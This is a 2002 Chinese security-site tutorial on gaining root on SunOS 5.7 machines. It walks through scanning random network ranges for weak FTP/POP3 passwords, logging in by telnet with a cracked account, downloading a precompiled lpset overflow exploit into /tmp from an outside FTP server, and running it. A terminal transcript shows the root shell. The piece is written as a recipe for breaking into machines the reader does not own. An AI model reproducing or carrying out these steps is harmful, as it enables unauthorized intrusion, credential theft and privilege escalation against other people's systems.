首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
如何获得SUNOS的ROOT权限(初级篇)
来源:vittersafe.tk 作者:vitter 发布时间:2002-08-29  

使用工具:流光IV,SecuCRT(在流光IV安装目录Other下) 1、用流光IV中的高级扫描扫描一个网段,为了加快速度就只选择POP3/FTP。 2、如果运气好,可以扫描到一个POP3或者FTP的密码(如果没有扫描到,就换一个网段试试)。通常UNIX的FTP和POP3帐号和SHELL帐号是一致的。 3、使用SecuCRT从Telnet登陆.

SunOS 5.7

login: market Password: No directory! Logging in with home=/ Last login: Wed Jun 6 23:02:31 from xxx.xxx.xxx.xxx Sun Microsystems Inc. SunOS 5.7 Generic October 1998 $ 利用FTP将对应版本的溢出程序,这里的版本是5.7,在流光IV的安装目录下Exploit\local\Sun Sparc\5.7下编译好的程序上传。这里我们上传lpset,注意一定要上传到有写权限的目录例如/tmp。 $ cd /tmp $ ls dsnmpserv.mbx dsnmpservtrap.mbx dsserv.mbx errorlog.rumo ppa_file ps_data $ ftp xxx.xxx.xxx.xxx Connected to xxx.xxx.xxx.xxx 220 ProFTPD 1.2.0 Server Name (xxx.xxx.xxx.xxx:market): username 331 Password required for username. Password: 230 User username logged in. ftp> bin 200 Type set to I. ftp> get lpset 200 PORT command successful. 150 Opening BINARY mode data connection for lpset (26148 bytes). 226 Transfer complete. local: lpset remote: lpset 26148 bytes received in 1.7 seconds (14.78 Kbytes/s) ftp> quit 221 Goodbye. $ 上传成功。 首先将程序改为可以运行。 $ chmod 777 lpset 运行。注意前面的./,在UNIX中如果运行当前目录下的程序必须用./开始,除非在Path中设置。 $ ./lpset copyright LAST STAGE OF DELIRIUM apr 2000 poland //lsd-pl.net/ /usr/bin/lpset for solaris 2.6 2.7 sparc

FNS for files is not installed Cannot use this command in this environment Use: fncreate -t org command to install # 这里就得到了ROOT.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·BSD源码系统telnetd严重溢出漏洞
·MS04-010 Microsoft MSN Messeng
·IIS漏洞整理
·MS04-009 MS Outlook存在允许远
·IBM DB2 远程命令执行权提升漏洞
·窥探YUZI的BBS3000社区安全性
·QMAIL qmail-qmtpd RELAYCLIENT
·远程溢出总结
·CGI安全漏洞资料速查
·Microsoft IE window.open搜索格
·Microsoft IE window.open Media
·Microsoft Content Management S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved